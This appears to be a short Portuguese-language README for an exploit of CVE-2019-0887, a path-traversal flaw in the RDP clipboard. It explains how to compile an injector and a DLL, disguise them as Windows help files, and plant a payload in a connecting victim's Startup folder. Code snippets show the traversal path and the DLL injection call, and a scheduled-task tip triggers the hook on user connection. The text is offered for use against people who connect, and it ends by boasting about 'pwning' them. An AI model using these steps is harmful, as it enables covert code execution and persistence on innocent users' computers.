
exp for CVE-2019-0887
Compile o CVE-2019-0887, renomeie para winhlp.dll
Compile o Install_Hook, renomeie para hook.exe
tenha cuidado, eles devem ser compilados com x64
Coloque-os no sistema malicioso assim
c:\windows\hook.exe
c:\windows\winhlp.dll
c:\windows\winhlp64.exe # something evil
se alguém quiser mudar o caminho, aqui está o ponto
# CVE-2019-0887/dllmain.cpp
WCHAR evalfile[] = { L"C:\\windows\\winhlp64.exe" };
WCHAR efile[] = { L"C:\\windows\\system32\\..\\..\\..\\..\\..\\../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/winhlp32.exe" };
# Install_Hook/ConsoleApplication.cpp
LoadDll(pid, "C:\\Windows\\winhlp.dll");
Talvez use taskschd.msc para criar um Plano de Tarefa, defina um Gatilho "Ao conectar à sessão do usuário" e defina o caminho do arquivo de hook.exe.
Esperando alguns caras se conectarem ao meu sistema malicioso, copiarem algo, e pwn...
Dicas: Por que não usar DLL hijack?